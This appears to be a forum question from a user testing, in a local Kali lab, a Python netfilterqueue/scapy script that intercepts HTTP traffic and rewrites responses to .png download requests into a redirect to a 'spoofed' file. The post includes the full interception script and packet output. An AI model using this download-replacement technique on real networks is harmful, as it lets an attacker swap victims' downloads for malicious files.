<!DOCTYPE html>
<html>
<head>
<title>Welcome to our test website</title>
</head>
<body>
<h1>Welcome to our test website</h1>
<a href="/cat.png" download>Click here to download picture of a cute cat</a>
</body>
</html>
I’m serving this webpage from my local kali machine with apache2 which ip is 10.0.2.4
When I visit this site from my local browser, it has a download link for a cat picture. The cat picture is located in my local kali machine /var/www/html/cat.png
Now I’m doing a test for educational purpose only which is by running a python script, I want to redirect the download link of the cat picture when clicked on the link and replace the cat picture with another picture named hacked.png which is located in /var/www/html/spoofed.png.
When I run the script and try to test this, no download prompt appears in the browser. Just opens another tab saying “Problem loading page”. The python script is:
#!/usr/bin/env python3
import netfilterqueue
import scapy.all as scapy
ack_list = []
def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
if scapy_packet.haslayer(scapy.TCP):
if scapy_packet[scapy.TCP].dport == 80:
if b".png" in scapy_packet[scapy.Raw].load:
print("\n[+] Request for .png file found\n")
ack_list.append(scapy_packet[scapy.TCP].ack)
print(scapy_packet.show())
elif scapy_packet[scapy.TCP].sport == 80:
if scapy_packet[scapy.TCP].seq in ack_list:
ack_list.remove(scapy_packet[scapy.TCP].seq) #Not needed anymore.
print("\n[+] Replacing download file.....\n")
scapy_packet[scapy.Raw].load = "HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.2.4/spoofed.png"
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.TCP].chksum
print(scapy_packet.show())
packet.set_payload(bytes(scapy_packet))
packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
And while testing, from terminal I get this in the response section:
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = None
id = 49469
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = None
src = 10.0.2.4
dst = 10.0.2.4
\options \
###[ TCP ]###
sport = http
dport = 33314
seq = 2997241229
ack = 433307214
dataofs = 8
reserved = 0
flags = PA
window = 512
chksum = None
urgptr = 0
options = [('NOP', None), ('NOP', None), ('Timestamp', (3320402094, 3320402092))]
###[ Raw ]###
load = 'HTTP/1.1 301 Moved Permanently\r\nLocation: http://10.0.2.4/spoofed.png'